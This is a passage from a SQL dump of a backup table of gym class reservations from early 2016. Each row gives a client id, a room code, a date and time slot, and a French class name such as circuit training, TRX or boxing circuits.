(5520, 48, 'CTR', '2016-01-06', '17h30', '18h', 'TRX Suspension Training'),
(5521, 48, 'CTR', '2016-01-09', '11h05', '11h35', 'Circuit Niveau 2'),
(5522, 48, 'CTR', '2016-01-09', '11h40', '12h10', 'Circuit Niveau 3'),
(5523, 31, 'CTR', '2016-01-06', '17h30', '18h', 'TRX Suspension Training'),
(5524, 31, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
(5574, 31, 'CTR', '2016-01-13', '17h30', '18h', 'TRX Suspension Training'),
(5573, 48, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5527, 211, 'CTR', '2016-01-07', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5529, 195, 'CTR', '2016-01-06', '17h30', '18h', 'TRX Suspension Training'),
(5530, 175, 'CTR', '2016-01-06', '17h30', '18h', 'TRX Suspension Training'),
(5532, 14, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
(5533, 44, 'CTR', '2016-01-07', '18h15', '18h45', 'Circuit Training'),
(5534, 168, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
(5535, 41, 'CTR', '2016-01-07', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5536, 41, 'CTR', '2016-01-07', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5537, 168, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5538, 44, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5539, 193, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5540, 138, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5560, 80, 'CTR', '2016-01-09', '10h30', '11h00', 'Circuit Niveau 1'),
(5559, 168, 'CTR', '2016-01-09', '10h30', '11h00', 'Circuit Niveau 1'),
(5543, 14, 'CTR', '2016-01-13', '19h ', '19h30', 'Circuit training'),
(5544, 41, 'CTR', '2016-01-13', '19h ', '19h30', 'Circuit training'),
(5591, 143, 'CTR', '2016-01-14', '18h15', '18h45', 'Circuit Training'),
(5547, 165, 'CTR', '2016-01-13', '19h ', '19h30', 'Circuit training'),
(5548, 164, 'CTR', '2016-01-13', '19h ', '19h30', 'Circuit training'),
(5594, 41, 'CTR', '2016-01-13', '19h ', '19h30', 'Circuit training'),
(5550, 188, 'CTR', '2016-01-13', '20h30', '21h', 'Circuit Training'),
(5551, 188, 'CTR', '2016-01-13', '20h30', '21h', 'Circuit Training'),
(5552, 180, 'CTR', '2016-01-13', '20h30', '21h', 'Circuit Training'),
(5553, 204, 'CTR', '2016-01-13', '20h30', '21h', 'Circuit Training'),
(5554, 173, 'CTR', '2016-01-13', '20h30', '21h', 'Circuit Training'),
(5555, 132, 'CTR', '2016-01-13', '20h30', '21h', 'Circuit Training'),
(5556, 175, 'CTR', '2016-01-13', '17h30', '18h', 'TRX Suspension Training'),
(5586, 35, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5585, 35, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5571, 80, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5562, 210, 'CTR', '2016-01-07', '18h15', '18h45', 'Circuit Training'),
(5563, 199, 'CTR', '2016-01-07', '12h45', '13h15', 'Circuit training'),
(5564, 105, 'CTR', '2016-01-07', '18h15', '18h45', 'Circuit Training'),
(5565, 134, 'CTR', '2016-01-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5572, 48, 'CTR', '2016-01-13', '17h30', '18h', 'TRX Suspension Training'),
(5567, 29, 'CTR', '2016-01-07', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5569, 213, 'CTR', '2016-01-12', '19h00', '19h30', 'Duo Training'),
(5570, 209, 'CTR', '2016-01-07', '19h00', '19h30', 'Personal Training'),
(5575, 31, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5583, 195, 'CTR', '2016-01-13', '19h ', '19h30', 'Circuit training'),
(5577, 210, 'CTR', '2016-01-14', '18h15', '18h45', 'Circuit Training'),
(5578, 30, 'CTR', '2016-01-13', '17h30', '18h', 'TRX Suspension Training'),
(5579, 138, 'CTR', '2016-01-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5580, 196, 'CTR', '2016-01-13', '20h30', '21h', 'Circuit Training'),
(5581, 210, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5582, 210, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5584, 195, 'CTR', '2016-01-13', '19h ', '19h30', 'Circuit training'),
(5587, 192, 'CTR', '2016-01-13', '18h15', '18h45', 'Circuit Training'),
(5588, 192, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5589, 192, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5590, 191, 'CTR', '2016-01-14', '18h15', '18h45', 'Circuit Training'),
(5612, 41, 'CTR', '2016-01-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5624, 48, 'CTR', '2016-01-20', '17h30', '18h', 'TRX Suspension Training'),
(5595, 209, 'CTR', '2016-01-14', '19h00', '19h30', 'Personal Training'),
(5596, 80, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5597, 80, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5598, 80, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5599, 80, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5600, 80, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5601, 80, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5602, 80, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5603, 80, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5604, 80, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5605, 80, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5606, 80, 'CTR', '2016-01-16', '11h05', '11h35', 'Circuit Niveau 2'),
(5607, 80, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5608, 80, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5609, 80, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5610, 80, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5611, 80, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5613, 41, 'CTR', '2016-01-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5614, 48, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5615, 48, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5616, 31, 'CTR', '2016-01-16', '10h30', '11h00', 'Circuit Niveau 1'),
(5617, 31, 'CTR', '2016-01-16', '11h40', '12h10', 'Circuit Niveau 3'),
(5618, 41, 'CTR', '2016-01-18', '18h15', '18h45', 'Heart Zone partie 1'),
(5683, 195, 'CTR', '2016-01-20', '17h30', '18h', 'TRX Suspension Training'),
(5621, 41, 'CTR', '2016-01-18', '18h45', '19h15', 'Heart Zone partie 2'),
(5622, 195, 'CTR', '2016-01-18', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5681, 14, 'CTR', '2016-01-18', '18h15', '18h45', 'Heart Zone partie 1'),
(5625, 31, 'CTR', '2016-01-20', '17h30', '18h', 'TRX Suspension Training'),
(5626, 48, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5627, 31, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5685, 41, 'CTR', '2016-01-25', '18h15', '18h45', 'Heart Zone partie 1'),
(5630, 138, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5707, 80, 'CTR', '2016-01-23', '10h15', '10h45', 'Circuit Niveau 1'),
(5632, 164, 'CTR', '2016-01-20', '19h ', '19h30', 'Circuit training'),
(5633, 168, 'CTR', '2016-01-20', '19h ', '19h30', 'Circuit training'),
(5634, 80, 'CTR', '2016-01-20', '19h ', '19h30', 'Circuit training'),
(5636, 14, 'CTR', '2016-01-20', '19h ', '19h30', 'Circuit training'),
(5637, 41, 'CTR', '2016-01-20', '19h ', '19h30', 'Circuit training'),
(5638, 41, 'CTR', '2016-01-20', '19h ', '19h30', 'Circuit training'),
(5639, 188, 'CTR', '2016-01-20', '20h30', '21h', 'Circuit Training'),
(5640, 188, 'CTR', '2016-01-20', '20h30', '21h', 'Circuit Training'),
(5657, 173, 'CTR', '2016-01-18', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5642, 173, 'CTR', '2016-01-20', '20h30', '21h', 'Circuit Training'),
(5643, 132, 'CTR', '2016-01-20', '20h30', '21h', 'Circuit Training'),
(5644, 180, 'CTR', '2016-01-20', '20h30', '21h', 'Circuit Training'),
(5645, 196, 'CTR', '2016-01-20', '20h30', '21h', 'Circuit Training'),
(5646, 60, 'CTR', '2016-01-20', '20h30', '21h', 'Circuit Training'),
(5647, 53, 'CTR', '2016-01-14', '18h15', '18h45', 'Circuit Training'),
(5648, 48, 'CTR', '2016-01-18', '18h15', '18h45', 'Heart Zone partie 1'),
(5649, 48, 'CTR', '2016-01-18', '18h45', '19h15', 'Heart Zone partie 2'),
(5650, 193, 'CTR', '2016-01-18', '18h15', '18h45', 'Heart Zone partie 1'),
(5651, 193, 'CTR', '2016-01-18', '18h45', '19h15', 'Heart Zone partie 2'),
(5652, 182, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5653, 184, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5654, 179, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5655, 183, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5656, 181, 'CTR', '2016-01-20', '18h15', '18h45', 'Circuit Training'),
(5680, 92, 'CTR', '2016-01-18', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5668, 213, 'CTR', '2016-01-19', '19h00', '19h30', 'Duo Training'),
(5660, 138, 'CTR', '2016-01-18', '18h15', '18h45', 'Heart Zone partie 1'),
(5661, 138, 'CTR', '2016-01-18', '18h45', '19h15', 'Heart Zone partie 2'),
(5662, 37, 'CTR', '2016-01-18', '17h30', '18h00', 'TRX Suspension Training'),
(5663, 213, 'CTR', '2016-01-17', '10h15', '10h45', 'Duo Training'),
(5896, 29, 'CTR', '2016-02-03', '17h30', '18h', 'TRX Suspension Training'),
(5665, 175, 'CTR', '2016-01-18', '17h30', '18h00', 'TRX Suspension Training'),
(5666, 210, 'CTR', '2016-01-18', '17h30', '18h00', 'TRX Suspension Training'),
(5667, 210, 'CTR', '2016-01-20', '17h30', '18h', 'TRX Suspension Training'),
(5669, 213, 'CTR', '2016-01-24', '10h15', '10h45', 'Duo Training'),
(5670, 209, 'CTR', '2016-01-21', '19h00', '19h30', 'Personal Training'),
(5671, 143, 'CTR', '2016-01-21', '18h15', '18h45', 'Circuit Training'),
(5672, 142, 'CTR', '2016-01-21', '18h15', '18h45', 'Circuit Training'),
(5673, 189, 'CTR', '2016-01-21', '12h45', '13h15', 'Circuit training'),
(5704, 210, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5676, 44, 'CTR', '2016-01-18', '18h15', '18h45', 'Heart Zone partie 1'),
(5677, 44, 'CTR', '2016-01-18', '18h45', '19h15', 'Heart Zone partie 2'),
(5678, 192, 'CTR', '2016-01-20', '19h ', '19h30', 'Circuit training'),
(5679, 80, 'CTR', '2016-01-18', '17h30', '18h00', 'TRX Suspension Training'),
(5682, 14, 'CTR', '2016-01-18', '18h45', '19h15', 'Heart Zone partie 2'),
(5684, 195, 'CTR', '2016-01-20', '17h30', '18h', 'TRX Suspension Training'),
(5686, 41, 'CTR', '2016-01-25', '18h45', '19h15', 'Heart Zone partie 2'),
(5687, 44, 'CTR', '2016-01-25', '18h15', '18h45', 'Heart Zone partie 1'),
(5688, 44, 'CTR', '2016-01-25', '18h45', '19h15', 'Heart Zone partie 2'),
(5689, 193, 'CTR', '2016-01-25', '18h15', '18h45', 'Heart Zone partie 1'),
(5690, 193, 'CTR', '2016-01-25', '18h45', '19h15', 'Heart Zone partie 2'),
(5691, 48, 'CTR', '2016-01-25', '18h15', '18h45', 'Heart Zone partie 1'),
(5692, 48, 'CTR', '2016-01-25', '18h45', '19h15', 'Heart Zone partie 2'),
(5693, 14, 'CTR', '2016-01-25', '18h15', '18h45', 'Heart Zone partie 1'),
(5694, 14, 'CTR', '2016-01-25', '18h45', '19h15', 'Heart Zone partie 2'),
(5766, 44, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5765, 44, 'CTR', '2016-01-23', '10h15', '10h45', 'Circuit Niveau 1'),
(5697, 92, 'CTR', '2016-01-25', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5698, 92, 'CTR', '2016-01-25', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5699, 195, 'CTR', '2016-01-25', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5700, 195, 'CTR', '2016-01-25', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5701, 175, 'CTR', '2016-01-20', '17h30', '18h', 'TRX Suspension Training'),
(5702, 140, 'CTR', '2016-01-21', '12h45', '13h15', 'Circuit training'),
(5703, 35, 'CTR', '2016-01-21', '12h45', '13h15', 'Circuit training'),
(5705, 210, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5706, 191, 'CTR', '2016-01-21', '12h45', '13h15', 'Circuit training'),
(5708, 80, 'CTR', '2016-01-23', '10h15', '10h45', 'Circuit Niveau 1'),
(5709, 80, 'CTR', '2016-01-23', '10h15', '10h45', 'Circuit Niveau 1'),
(5710, 80, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5711, 80, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5712, 80, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5713, 80, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5714, 80, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5715, 80, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5716, 80, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5717, 80, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5718, 80, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5719, 80, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(5720, 80, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5721, 80, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5722, 80, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5723, 80, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5724, 80, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5725, 211, 'CTR', '2016-01-21', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5726, 30, 'CTR', '2016-01-25', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5727, 30, 'CTR', '2016-01-25', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5728, 44, 'CTR', '2016-01-21', '18h15', '18h45', 'Circuit Training'),
(5729, 195, 'CTR', '2016-01-23', '10h15', '10h45', 'Circuit Niveau 1'),
(5730, 195, 'CTR', '2016-01-23', '10h15', '10h45', 'Circuit Niveau 1'),
(5731, 192, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5732, 192, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5733, 80, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5734, 48, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5735, 48, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5736, 80, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5737, 31, 'CTR', '2016-01-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5738, 31, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5739, 132, 'CTR', '2016-01-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5740, 132, 'CTR', '2016-01-23', '12h05', '12h35', 'Circuit Niveau 3'),
(5741, 195, 'CTR', '2016-01-25', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5742, 195, 'CTR', '2016-01-25', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5743, 173, 'CTR', '2016-01-25', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5744, 173, 'CTR', '2016-01-25', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5745, 138, 'CTR', '2016-01-27', '18h15', '18h45', 'Circuit Training'),
(5746, 179, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5747, 181, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5748, 168, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5749, 14, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5750, 80, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5780, 28, 'CTR', '2016-01-28', '12h45', '13h15', 'Circuit training'),
(5752, 165, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5753, 164, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5754, 60, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5755, 173, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5756, 132, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5757, 180, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5758, 188, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5759, 188, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5760, 209, 'CTR', '2016-01-28', '19h00', '19h30', 'Personal Training'),
(5761, 213, 'CTR', '2016-01-26', '19h00', '19h30', 'Duo Training'),
(5762, 28, 'CTR', '2016-01-21', '12h45', '13h15', 'Circuit training'),
(5779, 28, 'CTR', '2016-01-28', '12h45', '13h15', 'Circuit training'),
(5764, 29, 'CTR', '2016-01-21', '18h15', '18h45', 'Circuit Training'),
(5767, 53, 'CTR', '2016-01-21', '18h15', '18h45', 'Circuit Training'),
(5768, 37, 'CTR', '2016-01-25', '17h30', '18h00', 'TRX Suspension Training'),
(5769, 210, 'CTR', '2016-01-25', '17h30', '18h00', 'TRX Suspension Training'),
(5770, 213, 'CTR', '2016-01-31', '10h15', '10h45', 'Duo Training'),
(5771, 92, 'CTR', '2016-01-27', '18h15', '18h45', 'Circuit Training'),
(5772, 48, 'CTR', '2016-01-27', '18h15', '18h45', 'Circuit Training'),
(5773, 32, 'CTR', '2016-01-25', '17h30', '18h00', 'TRX Suspension Training'),
(5774, 31, 'CTR', '2016-01-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5775, 31, 'CTR', '2016-01-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5776, 31, 'CTR', '2016-01-27', '17h30', '18h', 'TRX Suspension Training'),
(5777, 31, 'CTR', '2016-01-27', '18h15', '18h45', 'Circuit Training'),
(5778, 191, 'CTR', '2016-01-28', '18h15', '18h45', 'Circuit Training'),
(5781, 199, 'CTR', '2016-01-28', '12h45', '13h15', 'Circuit training'),
(5782, 205, 'CTR', '2016-01-28', '12h45', '13h15', 'Circuit training'),
(5783, 212, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5828, 44, 'CTR', '2016-01-28', '18h15', '18h45', 'Circuit Training'),
(5785, 41, 'CTR', '2016-02-01', '18h15', '18h45', 'Heart Zone partie 1'),
(5873, 210, 'CTR', '2016-02-01', '18h45', '19h15', 'Heart Zone partie 2'),
(5787, 41, 'CTR', '2016-02-01', '18h45', '19h15', 'Heart Zone partie 2'),
(5872, 210, 'CTR', '2016-02-01', '18h15', '18h45', 'Heart Zone partie 1'),
(5789, 48, 'CTR', '2016-02-01', '18h15', '18h45', 'Heart Zone partie 1'),
(5790, 48, 'CTR', '2016-02-01', '18h45', '19h15', 'Heart Zone partie 2'),
(5791, 193, 'CTR', '2016-02-01', '18h15', '18h45', 'Heart Zone partie 1'),
(5792, 193, 'CTR', '2016-02-01', '18h45', '19h15', 'Heart Zone partie 2'),
(5793, 195, 'CTR', '2016-02-01', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5794, 195, 'CTR', '2016-02-01', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5795, 195, 'CTR', '2016-02-01', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5796, 195, 'CTR', '2016-02-01', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5797, 92, 'CTR', '2016-02-01', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5798, 92, 'CTR', '2016-02-01', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5799, 173, 'CTR', '2016-02-01', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5800, 173, 'CTR', '2016-02-01', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5801, 30, 'CTR', '2016-02-01', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5802, 30, 'CTR', '2016-02-01', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5839, 80, 'CTR', '2016-02-01', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5838, 80, 'CTR', '2016-02-01', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5805, 142, 'CTR', '2016-01-28', '18h15', '18h45', 'Circuit Training'),
(5806, 143, 'CTR', '2016-01-28', '18h15', '18h45', 'Circuit Training'),
(5807, 53, 'CTR', '2016-01-28', '18h15', '18h45', 'Circuit Training'),
(5809, 48, 'CTR', '2016-01-27', '17h30', '18h', 'TRX Suspension Training'),
(5810, 35, 'CTR', '2016-01-30', '10h15', '10h45', 'Circuit Niveau 1'),
(5811, 35, 'CTR', '2016-01-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5824, 44, 'CTR', '2016-01-27', '18h15', '18h45', 'Circuit Training'),
(5813, 196, 'CTR', '2016-01-27', '20h30', '21h', 'Circuit Training'),
(5814, 80, 'CTR', '2016-01-28', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5815, 80, 'CTR', '2016-01-28', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5816, 41, 'CTR', '2016-01-27', '17h30', '18h', 'TRX Suspension Training'),
(5817, 41, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5918, 14, 'CTR', '2016-02-08', '18h15', '18h45', 'Heart Zone partie 1'),
(5819, 41, 'CTR', '2016-02-08', '18h15', '18h45', 'Heart Zone partie 1'),
(5821, 41, 'CTR', '2016-02-08', '18h45', '19h15', 'Heart Zone partie 2'),
(5822, 41, 'CTR', '2016-02-10', '19h ', '19h30', 'Circuit training'),
(6014, 211, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(5825, 32, 'CTR', '2016-01-27', '17h30', '18h', 'TRX Suspension Training'),
(5826, 48, 'CTR', '2016-01-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5827, 48, 'CTR', '2016-01-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5829, 210, 'CTR', '2016-01-28', '18h15', '18h45', 'Circuit Training'),
(5830, 171, 'CTR', '2016-01-27', '19h ', '19h30', 'Circuit training'),
(5831, 49, 'CTR', '2016-01-28', '12h45', '13h15', 'Circuit training'),
(5832, 189, 'CTR', '2016-01-28', '12h45', '13h15', 'Circuit training'),
(5833, 80, 'CTR', '2016-01-30', '12h05', '12h35', 'Circuit Niveau 3'),
(5834, 80, 'CTR', '2016-01-30', '12h05', '12h35', 'Circuit Niveau 3'),
(5835, 105, 'CTR', '2016-01-28', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5836, 138, 'CTR', '2016-02-01', '18h15', '18h45', 'Heart Zone partie 1'),
(5837, 138, 'CTR', '2016-02-01', '18h45', '19h15', 'Heart Zone partie 2'),
(5840, 213, 'CTR', '2016-02-02', '19h00', '19h30', 'Duo Training'),
(5841, 192, 'CTR', '2016-01-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5842, 192, 'CTR', '2016-01-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5843, 80, 'CTR', '2016-01-30', '12h05', '12h35', 'Circuit Niveau 3'),
(5844, 171, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5845, 164, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5846, 165, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5847, 168, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5848, 182, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5849, 184, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5850, 183, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5851, 179, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5852, 181, 'CTR', '2016-02-03', '19h ', '19h30', 'Circuit training'),
(5853, 92, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5854, 138, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5856, 173, 'CTR', '2016-02-03', '20h30', '21h', 'Circuit Training'),
(5858, 180, 'CTR', '2016-02-03', '20h30', '21h', 'Circuit Training'),
(5859, 132, 'CTR', '2016-02-03', '20h30', '21h', 'Circuit Training'),
(5860, 188, 'CTR', '2016-02-03', '20h30', '21h', 'Circuit Training'),
(5861, 188, 'CTR', '2016-02-03', '20h30', '21h', 'Circuit Training'),
(5862, 213, 'CTR', '2016-02-07', '10h15', '10h45', 'Duo Training'),
(5864, 142, 'CTR', '2016-02-04', '18h15', '18h45', 'Circuit Training'),
(5865, 143, 'CTR', '2016-02-04', '18h15', '18h45', 'Circuit Training'),
(5866, 31, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5867, 180, 'CTR', '2016-02-01', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5868, 180, 'CTR', '2016-02-01', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5875, 32, 'CTR', '2016-02-01', '18h15', '18h45', 'Heart Zone partie 1'),
(5874, 32, 'CTR', '2016-02-01', '18h45', '19h15', 'Heart Zone partie 2'),
(5871, 211, 'CTR', '2016-02-03', '20h30', '21h', 'Circuit Training'),
(5876, 48, 'CTR', '2016-02-03', '17h30', '18h', 'TRX Suspension Training'),
(5877, 48, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5878, 48, 'CTR', '2016-02-06', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5879, 48, 'CTR', '2016-02-06', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5880, 31, 'CTR', '2016-02-03', '17h30', '18h', 'TRX Suspension Training'),
(5881, 31, 'CTR', '2016-02-06', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5882, 31, 'CTR', '2016-02-06', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5883, 191, 'CTR', '2016-02-04', '18h15', '18h45', 'Circuit Training'),
(5884, 41, 'CTR', '2016-02-15', '18h15', '18h45', 'Heart Zone partie 1'),
(5885, 41, 'CTR', '2016-02-15', '18h45', '19h15', 'Heart Zone partie 2'),
(5886, 195, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5887, 195, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5924, 189, 'CTR', '2016-02-04', '12h45', '13h15', 'Circuit training'),
(5889, 28, 'CTR', '2016-02-04', '12h45', '13h15', 'Circuit training'),
(5890, 199, 'CTR', '2016-02-04', '12h45', '13h15', 'Circuit training'),
(5891, 205, 'CTR', '2016-02-04', '12h45', '13h15', 'Circuit training'),
(5892, 80, 'CTR', '2016-02-04', '12h45', '13h15', 'Circuit training'),
(5893, 217, 'CTR', '2016-02-03', '17h30', '18h', 'TRX Suspension Training'),
(5894, 200, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5895, 80, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5897, 216, 'CTR', '2016-02-03', '17h30', '18h', 'TRX Suspension Training'),
(5898, 168, 'CTR', '2016-02-03', '18h15', '18h45', 'Circuit Training'),
(5899, 138, 'CTR', '2016-02-08', '18h15', '18h45', 'Heart Zone partie 1'),
(5900, 138, 'CTR', '2016-02-08', '18h45', '19h15', 'Heart Zone partie 2'),
